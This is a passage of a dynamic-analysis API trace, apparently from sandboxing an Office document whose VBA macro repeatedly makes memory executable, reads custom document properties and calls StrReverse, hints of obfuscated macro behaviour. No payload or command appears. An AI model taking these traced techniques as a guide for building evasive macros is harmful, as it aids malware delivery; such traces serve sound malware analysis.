lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0103.558] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.559] GetCurrentProcess () returned 0xffffffff [0103.559] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0103.559] GetCurrentProcess () returned 0xffffffff [0103.559] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0103.559] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.559] GetCurrentProcess () returned 0xffffffff [0103.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0103.560] GetCurrentProcess () returned 0xffffffff [0103.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0103.560] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.560] GetCurrentProcess () returned 0xffffffff [0103.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0103.560] GetCurrentProcess () returned 0xffffffff [0103.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0103.560] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.561] GetCurrentProcess () returned 0xffffffff [0103.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0103.561] GetCurrentProcess () returned 0xffffffff [0103.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0103.561] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.561] GetCurrentProcess () returned 0xffffffff [0103.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0103.562] GetCurrentProcess () returned 0xffffffff [0103.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0103.562] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.562] GetCurrentProcess () returned 0xffffffff [0103.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0103.562] GetCurrentProcess () returned 0xffffffff [0103.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0103.562] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.563] GetCurrentProcess () returned 0xffffffff [0103.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0103.563] GetCurrentProcess () returned 0xffffffff [0103.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0103.563] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.563] GetCurrentProcess () returned 0xffffffff [0103.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0103.563] GetCurrentProcess () returned 0xffffffff [0103.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0103.564] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.564] GetCurrentProcess () returned 0xffffffff [0103.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0103.564] GetCurrentProcess () returned 0xffffffff [0103.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0103.564] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.565] GetCurrentProcess () returned 0xffffffff [0103.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0103.565] GetCurrentProcess () returned 0xffffffff [0103.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0103.565] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.565] GetCurrentProcess () returned 0xffffffff [0103.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0103.565] GetCurrentProcess () returned 0xffffffff [0103.566] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0103.566] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.566] GetCurrentProcess () returned 0xffffffff [0103.566] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0103.566] GetCurrentProcess () returned 0xffffffff [0103.566] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0103.566] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.567] GetCurrentProcess () returned 0xffffffff [0103.567] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0103.567] GetCurrentProcess () returned 0xffffffff [0103.567] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0103.567] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.567] GetCurrentProcess () returned 0xffffffff [0103.567] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0103.567] GetCurrentProcess () returned 0xffffffff [0103.567] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0103.568] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.568] GetCurrentProcess () returned 0xffffffff [0103.568] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0103.568] GetCurrentProcess () returned 0xffffffff [0103.568] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0103.568] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.569] GetCurrentProcess () returned 0xffffffff [0103.569] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0103.569] GetCurrentProcess () returned 0xffffffff [0103.569] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0103.569] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.569] GetCurrentProcess () returned 0xffffffff [0103.569] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0103.569] GetCurrentProcess () returned 0xffffffff [0103.569] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0103.570] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.570] GetCurrentProcess () returned 0xffffffff [0103.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0103.570] GetCurrentProcess () returned 0xffffffff [0103.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0103.570] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.571] GetCurrentProcess () returned 0xffffffff [0103.571] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0103.571] GetAsyncKeyState (vKey=3) returned 0 [0103.572] CRetailMalloc_Alloc () returned 0xcad0240 [0103.572] memcpy (in: _Dst=0xaf5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52ce2, cbMultiByte=15, lpWideCharStr=0x1976a4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0103.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32bca, cbMultiByte=15, lpWideCharStr=0x197704, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0103.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32bca, cbMultiByte=15, lpWideCharStr=0x197704, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0103.674] CRetailMalloc_Alloc () returned 0xc8460d0 [0103.674] CRetailMalloc_Realloc () returned 0xc991a40 [0103.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32bca, cbMultiByte=15, lpWideCharStr=0x1976c4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0103.675] CRetailMalloc_Realloc () returned 0xc89da68 [0103.676] CRetailMalloc_Realloc () returned 0xcbbf4d0 [0103.677] memcpy (in: _Dst=0xaf516c, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.677] CRetailMalloc_Alloc () returned 0xc846160 [0103.677] CRetailMalloc_Realloc () returned 0xcaa38b0 [0103.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10632, cbMultiByte=25, lpWideCharStr=0x1976dc, cchWideChar=26 | out: lpWideCharStr="CustomDocumentProperties") returned 25 [0103.678] CRetailMalloc_Realloc () returned 0xf5d1458 [0103.678] memcpy (in: _Dst=0xaf5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52d0e, cbMultiByte=11, lpWideCharStr=0x1976a4, cchWideChar=12 | out: lpWideCharStr="StrReverse") returned 11 [0103.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d1060a, cbMultiByte=11, lpWideCharStr=0x197704, cchWideChar=12 | out: lpWideCharStr="StrReverse") returned 11 [0103.680] CRetailMalloc_Realloc () returned 0xf5d2478 [0103.680] CRetailMalloc_Realloc () returned 0xcbc96d0 [0103.680] CRetailMalloc_Realloc () returned 0xcbec438 [0103.680] memcpy (in: _Dst=0xaf5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.681] CRetailMalloc_Realloc () returned 0xcbc0610 [0103.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6842ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0103.681] CRetailMalloc_Realloc () returned 0xcad0a50 [0103.681] memcpy (in: _Dst=0xcad02a0, _Src=0x197924, _Size=0x18 | out: _Dst=0xcad02a0) returned 0xcad02a0 [0103.681] CRetailMalloc_Realloc () returned 0xcad0240 [0103.682] CRetailMalloc_Free () returned 0x1 [0103.682] GetCurrentProcess () returned 0xffffffff [0103.682] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0103.682] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.683] GetCurrentProcess () returned 0xffffffff [0103.683] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0103.683] GetCurrentProcess () returned 0xffffffff [0103.684] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0103.684] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.684] GetCurrentProcess () returned 0xffffffff [0103.684] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0103.684] GetCurrentProcess () returned 0xffffffff [0103.684] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0103.684] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.685] GetCurrentProcess () returned 0xffffffff [0103.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0103.685] GetCurrentProcess () returned 0xffffffff [0103.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0103.685] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.686] GetCurrentProcess () returned 0xffffffff [0103.686] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0103.686] GetCurrentProcess () returned 0xffffffff [0103.686] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0103.686] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.686] GetCurrentProcess () returned 0xffffffff [0103.686] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0103.686] GetCurrentProcess () returned 0xffffffff [0103.686] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0103.686] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.687] GetCurrentProcess () returned 0xffffffff [0103.687] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0103.687] GetCurrentProcess () returned 0xffffffff [0103.687] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0103.687] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.688] GetCurrentProcess () returned 0xffffffff [0103.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0103.688] GetCurrentProcess () returned 0xffffffff [0103.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0103.688] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.688] GetCurrentProcess () returned 0xffffffff [0103.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0103.689] GetCurrentProcess () returned 0xffffffff [0103.689] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0103.689] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.689] GetCurrentProcess () returned 0xffffffff [0103.689] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0103.689] GetCurrentProcess () returned 0xffffffff [0103.689] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0103.689] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.690] GetCurrentProcess () returned 0xffffffff [0103.690] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0103.690] GetCurrentProcess () returned 0xffffffff [0103.690] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0103.690] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.691] GetCurrentProcess () returned 0xffffffff [0103.691] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0103.691] GetCurrentProcess () returned 0xffffffff [0103.691] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0103.691] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.691] GetCurrentProcess () returned 0xffffffff [0103.691] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0103.691] GetCurrentProcess () returned 0xffffffff [0103.691] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0103.691] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.692] GetCurrentProcess () returned 0xffffffff [0103.692] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0103.692] GetCurrentProcess () returned 0xffffffff [0103.692] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0103.692] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.693] GetCurrentProcess () returned 0xffffffff [0103.693] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0103.693] GetCurrentProcess () returned 0xffffffff [0103.693] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0103.693] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.693] GetCurrentProcess () returned 0xffffffff [0103.693] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0103.693] GetCurrentProcess () returned 0xffffffff [0103.694] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0103.694] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.694] GetCurrentProcess () returned 0xffffffff [0103.694] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0103.694] GetCurrentProcess () returned 0xffffffff [0103.694] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0103.694] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.695] GetCurrentProcess () returned 0xffffffff [0103.695] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0103.695] GetCurrentProcess () returned 0xffffffff [0103.695] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0103.695] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.696] GetCurrentProcess () returned 0xffffffff [0103.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0103.696] GetCurrentProcess () returned 0xffffffff [0103.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0103.696] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.696] GetCurrentProcess () returned 0xffffffff [0103.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0103.696] GetCurrentProcess () returned 0xffffffff [0103.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0103.697] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.697] GetCurrentProcess () returned 0xffffffff [0103.697] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0103.697] GetCurrentProcess () returned 0xffffffff [0103.697] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0103.697] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.698] GetCurrentProcess () returned 0xffffffff [0103.698] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0103.698] GetCurrentProcess () returned 0xffffffff [0103.698] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0103.698] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.699] GetCurrentProcess () returned 0xffffffff [0103.699] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0103.699] GetCurrentProcess () returned 0xffffffff [0103.699] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0103.699] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.700] GetCurrentProcess () returned 0xffffffff [0103.700] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0103.700] GetCurrentProcess () returned 0xffffffff [0103.700] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0103.700] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.701] GetCurrentProcess () returned 0xffffffff [0103.701] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0103.701] GetCurrentProcess () returned 0xffffffff [0103.701] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0103.701] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.701] GetCurrentProcess () returned 0xffffffff [0103.701] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0103.701] GetCurrentProcess () returned 0xffffffff [0103.701] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0103.701] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.702] GetCurrentProcess () returned 0xffffffff [0103.702] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0103.702] GetCurrentProcess () returned 0xffffffff [0103.702] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0103.702] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.703] GetCurrentProcess () returned 0xffffffff [0103.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0103.703] GetCurrentProcess () returned 0xffffffff [0103.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0103.703] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.704] GetCurrentProcess () returned 0xffffffff [0103.704] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0103.704] GetCurrentProcess () returned 0xffffffff [0103.704] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0103.704] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.704] GetCurrentProcess () returned 0xffffffff [0103.704] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0103.704] GetCurrentProcess () returned 0xffffffff [0103.704] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0103.705] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.705] GetCurrentProcess () returned 0xffffffff [0103.705] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0103.705] GetCurrentProcess () returned 0xffffffff [0103.705] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0103.705] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0103.706] GetCurrentProcess () returned 0xffffffff [0103.706] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0103.706] SetErrorMode (uMode=0x8001) returned 0x8001 [0103.706] _stricmp 